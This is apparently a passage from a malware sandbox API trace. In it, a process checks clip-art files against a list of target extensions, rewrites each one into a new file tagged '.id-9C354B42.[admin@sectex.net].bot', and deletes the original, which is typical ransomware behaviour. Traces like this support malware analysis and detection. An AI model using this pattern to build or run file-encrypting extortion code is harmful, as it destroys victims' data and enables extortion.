	[0143.031] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63
	[0143.032] lstrlenW (lpString=".jpg") returned 4
	[0143.032] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.032] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.032] lstrlenW (lpString="BS00145_.WMF") returned 12
	[0143.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.171] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1712) returned 1
	[0143.171] CloseHandle (hObject=0x3c4) returned 1
	[0143.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf")) returned 0x20
	[0143.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0143.203] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.203] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.208] GetLastError () returned 0x0
	[0143.208] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x6b0, lpOverlapped=0x0) returned 1
	[0143.210] WriteFile (in: hFile=0x2a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x6c0, lpOverlapped=0x0) returned 1
	[0143.211] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.211] WriteFile (in: hFile=0x2a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.211] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.211] CloseHandle (hObject=0x2a0) returned 1
	[0143.211] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.211] SetEndOfFile (hFile=0x31c) returned 1
	[0143.213] CloseHandle (hObject=0x31c) returned 1
	[0143.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.242] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf")) returned 1
	[0143.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.283] lstrlenW (lpString=".doc") returned 4
	[0143.283] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.283] lstrlenW (lpString=".docx") returned 5
	[0143.283] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.283] lstrlenW (lpString=".pdf") returned 4
	[0143.283] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.283] lstrlenW (lpString=".xls") returned 4
	[0143.283] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.283] lstrlenW (lpString=".xlsx") returned 5
	[0143.283] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.283] lstrlenW (lpString=".ppt") returned 4
	[0143.283] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.283] lstrlenW (lpString=".zip") returned 4
	[0143.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.283] lstrlenW (lpString=".rar") returned 4
	[0143.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.284] lstrlenW (lpString=".bz2") returned 4
	[0143.284] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.284] lstrlenW (lpString=".7z") returned 3
	[0143.284] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.284] lstrlenW (lpString=".dbf") returned 4
	[0143.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.284] lstrlenW (lpString=".1cd") returned 4
	[0143.284] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.284] lstrlenW (lpString=".jpg") returned 4
	[0143.284] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.284] lstrlenW (lpString=".doc") returned 4
	[0143.284] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.284] lstrlenW (lpString=".docx") returned 5
	[0143.284] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.284] lstrlenW (lpString=".pdf") returned 4
	[0143.284] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.284] lstrlenW (lpString=".xls") returned 4
	[0143.284] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.284] lstrlenW (lpString=".xlsx") returned 5
	[0143.284] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.284] lstrlenW (lpString=".ppt") returned 4
	[0143.284] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.284] lstrlenW (lpString=".zip") returned 4
	[0143.284] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.284] lstrlenW (lpString=".rar") returned 4
	[0143.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.284] lstrlenW (lpString=".bz2") returned 4
	[0143.285] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.285] lstrlenW (lpString=".7z") returned 3
	[0143.285] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.285] lstrlenW (lpString=".dbf") returned 4
	[0143.285] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.285] lstrlenW (lpString=".1cd") returned 4
	[0143.285] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63
	[0143.285] lstrlenW (lpString=".jpg") returned 4
	[0143.285] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.285] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.285] lstrlenW (lpString="BS00440_.WMF") returned 12
	[0143.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0143.317] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5580) returned 1
	[0143.317] CloseHandle (hObject=0x38c) returned 1
	[0143.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf")) returned 0x20
	[0143.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0143.318] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.318] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.319] GetLastError () returned 0x0
	[0143.319] ReadFile (in: hFile=0x38c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x15cc, lpOverlapped=0x0) returned 1
	[0143.361] WriteFile (in: hFile=0x3cc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x15d0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x15d0, lpOverlapped=0x0) returned 1
	[0143.362] ReadFile (in: hFile=0x38c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.362] WriteFile (in: hFile=0x3cc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.362] SetEndOfFile (hFile=0x3cc) returned 1
	[0143.397] CloseHandle (hObject=0x3cc) returned 1
	[0143.397] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.397] SetEndOfFile (hFile=0x38c) returned 1
	[0143.399] CloseHandle (hObject=0x38c) returned 1
	[0143.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.447] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf")) returned 1
	[0143.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.497] lstrlenW (lpString=".doc") returned 4
	[0143.497] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.497] lstrlenW (lpString=".docx") returned 5
	[0143.497] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.497] lstrlenW (lpString=".pdf") returned 4
	[0143.497] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.498] lstrlenW (lpString=".xls") returned 4
	[0143.498] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.498] lstrlenW (lpString=".xlsx") returned 5
	[0143.498] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.498] lstrlenW (lpString=".ppt") returned 4
	[0143.498] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.498] lstrlenW (lpString=".zip") returned 4
	[0143.498] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.498] lstrlenW (lpString=".rar") returned 4
	[0143.498] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.498] lstrlenW (lpString=".bz2") returned 4
	[0143.498] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.498] lstrlenW (lpString=".7z") returned 3
	[0143.498] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.498] lstrlenW (lpString=".dbf") returned 4
	[0143.498] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.498] lstrlenW (lpString=".1cd") returned 4
	[0143.498] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.498] lstrlenW (lpString=".jpg") returned 4
	[0143.498] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.498] lstrlenW (lpString=".doc") returned 4
	[0143.498] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.498] lstrlenW (lpString=".docx") returned 5
	[0143.498] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.498] lstrlenW (lpString=".pdf") returned 4
	[0143.498] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.498] lstrlenW (lpString=".xls") returned 4
	[0143.499] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.499] lstrlenW (lpString=".xlsx") returned 5
	[0143.499] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.499] lstrlenW (lpString=".ppt") returned 4
	[0143.499] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.499] lstrlenW (lpString=".zip") returned 4
	[0143.499] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.499] lstrlenW (lpString=".rar") returned 4
	[0143.499] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.499] lstrlenW (lpString=".bz2") returned 4
	[0143.499] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.499] lstrlenW (lpString=".7z") returned 3
	[0143.499] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.499] lstrlenW (lpString=".dbf") returned 4
	[0143.499] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.499] lstrlenW (lpString=".1cd") returned 4
	[0143.499] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63
	[0143.499] lstrlenW (lpString=".jpg") returned 4
	[0143.499] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.499] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.499] lstrlenW (lpString="BS01634_.WMF") returned 12
	[0143.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.546] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3494) returned 1
	[0143.546] CloseHandle (hObject=0x3c4) returned 1
	[0143.546] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf")) returned 0x20
	[0143.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.566] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.566] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.567] GetLastError () returned 0x0
	[0143.567] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xda6, lpOverlapped=0x0) returned 1
	[0143.568] WriteFile (in: hFile=0x3b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xdb0, lpOverlapped=0x0) returned 1
	[0143.569] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.569] WriteFile (in: hFile=0x3b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.569] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.569] CloseHandle (hObject=0x3b4) returned 1
	[0143.570] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.570] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.571] CloseHandle (hObject=0x3c0) returned 1
	[0143.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.572] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf")) returned 1
	[0143.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.574] lstrlenW (lpString=".doc") returned 4
	[0143.574] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.574] lstrlenW (lpString=".docx") returned 5
	[0143.574] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.574] lstrlenW (lpString=".pdf") returned 4
	[0143.574] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.574] lstrlenW (lpString=".xls") returned 4
	[0143.574] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.574] lstrlenW (lpString=".xlsx") returned 5
	[0143.574] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.574] lstrlenW (lpString=".ppt") returned 4
	[0143.574] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.574] lstrlenW (lpString=".zip") returned 4
	[0143.574] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.574] lstrlenW (lpString=".rar") returned 4
	[0143.574] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.574] lstrlenW (lpString=".bz2") returned 4
	[0143.574] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.574] lstrlenW (lpString=".7z") returned 3
	[0143.574] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.574] lstrlenW (lpString=".dbf") returned 4
	[0143.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.575] lstrlenW (lpString=".1cd") returned 4
	[0143.575] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.575] lstrlenW (lpString=".jpg") returned 4
	[0143.575] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.575] lstrlenW (lpString=".doc") returned 4
	[0143.575] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.575] lstrlenW (lpString=".docx") returned 5
	[0143.575] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.575] lstrlenW (lpString=".pdf") returned 4
	[0143.575] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.575] lstrlenW (lpString=".xls") returned 4
	[0143.575] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.575] lstrlenW (lpString=".xlsx") returned 5
	[0143.575] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.575] lstrlenW (lpString=".ppt") returned 4
	[0143.575] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.575] lstrlenW (lpString=".zip") returned 4
	[0143.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.575] lstrlenW (lpString=".rar") returned 4
	[0143.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.575] lstrlenW (lpString=".bz2") returned 4
	[0143.575] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.575] lstrlenW (lpString=".7z") returned 3
	[0143.575] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.575] lstrlenW (lpString=".dbf") returned 4
	[0143.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.576] lstrlenW (lpString=".1cd") returned 4
	[0143.576] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63
	[0143.576] lstrlenW (lpString=".jpg") returned 4
	[0143.576] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
